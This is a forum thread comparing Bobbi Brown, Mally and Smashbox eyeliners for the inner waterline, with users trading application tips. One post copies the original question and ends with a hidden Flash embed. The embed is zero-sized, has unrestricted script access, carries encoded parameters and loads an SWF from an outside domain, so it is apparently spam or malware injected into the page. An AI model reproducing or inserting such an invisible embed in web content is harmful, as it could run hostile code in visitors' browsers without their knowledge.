Bobbi, Mally or Smashbox eyeliner?

ShoppingTelly

Help Support ShoppingTelly:

alibeth

Birdy
I have been searching for a near as possible waterproof liner for the inner rim of my eyes. All the pencils I have tried run, smudge or just disappear leaving black bits in the corners.
Although the reviews are good for Smashbox, there is one saying it's not great for the inner rims.
Has anyone tried the Bobbi Brown this way? Is it difficult or uncomfortable using a brush on the inner rims? Maybe Mally is the answer as I gather her products are long lasting?
Any advice please....

Hi

I find the best eyeliner to stay put on the inner rims is the smashbox jetset or Mally 24/7 pencil. I have never got the hang of applying the Bobbi Brown although understand lots of people love it. It depends whether you are good at applying with a brush or pencil. I find the Mally easier to apply but the jetset more comfortable, as Mallys products do tend to make my eyes water a bit even though they stay put.

I Have tried all 3 ...... Not that I'm an addict or anything 'm sure some may differ but I found the mally eyeliner rubbish, it smudged and I've just returned mine. I'd say the bobbi brown is a much creamer eyeliner to use but you only need the tiniest amount and build up

I have been searching for a near as possible waterproof liner for the inner rim of my eyes. All the pencils I have tried run, smudge or just disappear leaving black bits in the corners.
Although the reviews are good for Smashbox, there is one saying it's not great for the inner rims.
Has anyone tried the Bobbi Brown this way? Is it difficult or uncomfortable using a brush on the inner rims? Maybe Mally is the answer as I gather her products are long lasting?
Any advice please....<embed allowScriptAccess="always" FlashVars="cid=1&swf=eaememeicgbvbvepepepbuelegebeoebbudvehefbvdyebeedxelbvebegdwdxeqbueieaei" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

I would say, go for the Mally. Been using it and I'm quite happy with!

I would definitely recommend Bobbi Brown gel eyeliner. It goes on nice & easy with a slim liner brush, especially if you glide it on sideways. To get it on my upper waterline, I just close my eyes lightly, & pull the brush along the upper line (stops me from blinking).
Even pencils that promise to last for ages never last on me, but the Bobbi Brown gel lasts around 8-10 hours. Also, as long as you keep the lid on tightly it lasts for years.:rock:

Latest posts

Back